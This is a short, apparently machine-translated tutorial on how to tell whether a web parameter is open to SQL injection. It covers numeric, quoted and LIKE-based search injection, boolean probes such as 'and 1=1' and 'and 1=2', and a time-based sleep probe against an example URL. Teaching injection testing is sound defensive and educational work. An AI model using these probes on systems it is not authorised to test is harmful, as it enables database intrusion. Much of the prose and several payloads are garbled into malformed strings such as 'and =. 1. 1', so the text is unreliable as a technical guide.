Analyzing SQL injection injection type of
injection into numeric and character type and the search type
such as a digital type statement: select * from table where id = 3, then the character following: select * from table where name = 'admin'. Visible in the test need to add quotation marks to make the closing argument if the page returns the correct character is injected, no need to add a numeric injection.
1. Numeric directly into the query:
SELECT * from <table name> WHERE ID = X and =. 1. 1
SELECT * from <table name> WHERE ID = X = 2. 1 and
2. After the query character into the required closure:
select * from <table name> WHERE ID = 'X' and '. 1' = '. 1'
select * from <table name> WHERE ID = 'X' and '. 1' = '2'
3. type Search:
Usually appears in the search query, the search type to be injected, we have to look at the data sql query where clause uses knowledge Like operator, Like operator role is fuzzy query, use fuzzy queries must Like but also with a wildcard to complete, "%" is a wildcard Like operator in, it represents zero or more of any character, for everyone to understand, as we gave some examples:
Like ' sina%' // returns any character sina started
Like ' % sina' // returns any character at the end of sina
Like ' %% sina' // returns contain any character of sina
a% 'and 1 = 1 - Normal
a%' and 1 = 2 - Error
Determine whether there is injected into the SQL injection
1. injection method for determining significant wrong
as such a site www.example.com/index.php?id=1, first of all let's be the first step in determining whether there is injected, first in the number 1 after the single quotation marks', if the wrong page, there Sql injection, but if the injection point and server can also use codes and server configurations are closely related (e.g., by filtration or some dangerous functions may be utilized not limit the length parameter). Secondly, may also be used logic symbols to determine the presence or absence of injection parameter is increased and 1 = 1 and and 1 = 2, if and 1 = 1 page is returned to normal, and 1 = 2 returns an error, Sql injection there (which is Sql characteristics operator syntax, SQL aND & OR operator if the first and second conditions are true, the aND operator displays a record. If the first condition and the second condition as long as one is established, OR operator displays a record.) otherwise, the injection does not necessarily exist. The same can also be used to determine whether there is or injection. Note that, we need to determine whether to add comment symbol marks or parameters throughout the injection point depending on the type.
2. no significant error of judgment method
when no error in single quotation marks and and or, there may be injected, because the server may still return to the original page in the configuration parameter error, so even if there is injected into the page will not change the . We can use the time to return the page to determine whether there is injected, as and if (1 = 0,1, sleep (10)), note that whether to use single quotes or comment character. Different databases have different delay functions, need be used in specific circumstances.